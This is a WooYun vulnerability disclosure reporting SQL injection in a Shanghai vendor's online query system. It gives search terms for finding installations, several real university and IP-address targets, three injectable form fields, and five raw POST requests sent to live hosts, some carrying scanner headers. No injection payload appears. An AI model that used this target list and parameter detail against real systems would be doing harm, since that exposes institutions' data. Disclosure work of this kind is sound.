当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081081

漏洞标题:某查询系统存在通用SQL注入漏洞

相关厂商:上海财大科技发展公司

漏洞作者: Mr.leo

提交时间:2014-10-29 16:24

修复时间:2015-01-27 16:26

公开时间:2015-01-27 16:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向第三方安全合作伙伴开放
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-01-27: 细节向公众公开

简要描述:

BOOM!!

详细说明:

厂商:上海财大科技发展公司(参考百度文库资料)
百度搜索关键字:科发网上查询系统
http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8
http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8

001.png


002.png


案例如下:
http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
http://61.142.174.200/cwc/KFweb/wjmm.aspx
http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
http://221.5.51.228/cjb/wjmm.aspx
http://210.45.92.21/wjmm.aspx
http://www.shcdkf.com/kfweb/wjmm.aspx
http://cwc.sxufe.edu.cn/KfWeb/wjmm.aspx
三个参数都存在注入,TextBox_xm、TextBox_sfz、TextBox_yhm 为TextBox_xm为例:
五个案例证明:
1、http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
POST http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx HTTP/1.1
Host: cwch.ahu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
Cookie: ASP.NET_SessionId=kwogas453javiuqbykovnhuo; K_V_D_ASP.NET_SessionId=apcookfgcoefkappdpddcafgebennhohfnninmbclohkmniaeebfinbioffiimlaicmimobhajok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTM3NDU0MDU3ZGSC3oXtb6olw1bKF%2FNkUya696jmaA%3D%3D&TextBox_xm=1&TextBox_sfz=2&TextBox_yhm=3&Button_tj=%CC%E1%BD%BB&__EVENTVALIDATION=%2FwEWBgLe1OSNAwLh04iPCwLw7pu8DgKvzdH%2BCALWyuD7AgLmyryBDAiFep3lc0k5gWsZKG2GzYRWcWOE

003.png


004.png


2、http://61.142.174.200/cwc/KFweb/wjmm.aspx
POST /cwc/KFweb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://61.142.174.200/cwc/KFweb/wjmm.aspx
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=bcyxzd45zx4qnh553bcgefq3
Host: 61.142.174.200
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKGwdCsBgLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDMe91X4sMkFdyUIlWmAsGYe8ZoVE&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGR5P7UyiNMYg8NlcpcpuRkEaUl1Ow%3d%3d

005.png


006.png


3、http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
POST /kfweb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=oc5kwrnykdrfdn55pcd21055
Host: gzcx.tynu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgLq2MbEBQLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDKp3r77uz2yPpfcNFXI3isVTKLNP&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGQNe1wC%2b6bTd4MUAkQIuJzkQdgMhA%3d%3d

007.png


008.png


4、http://221.5.51.228/cjb/wjmm.aspx
POST /cjb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://221.5.51.228/cjb/wjmm.aspx
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=xieqrheghgjoar45r2aopx55
Host: 221.5.51.228
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKOlbTNBwLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDKO%2bODdAQ/uALsU7wCu1bAkKwmz9&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGTnp9oFQuKltgpOexX2KbOSio0VVA%3d%3d

111.png


112.png


5、http://210.45.92.21/wjmm.aspx
POST /wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://210.45.92.21/wjmm.aspx
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=2eqrjqf3vxptkry1o0az42eu
Host: 210.45.92.21
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgLLqZWEBQLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDPT5vIGXydiQUva6RJDvOuVPqXt9&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGQhkZHE52jodq4/B9xIgUnfTQQs9A%3d%3d

113.png


115.png


漏洞证明:

已经证明

修复方案:

过滤

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-11-03 11:24

厂商回复:

最新状态:

暂无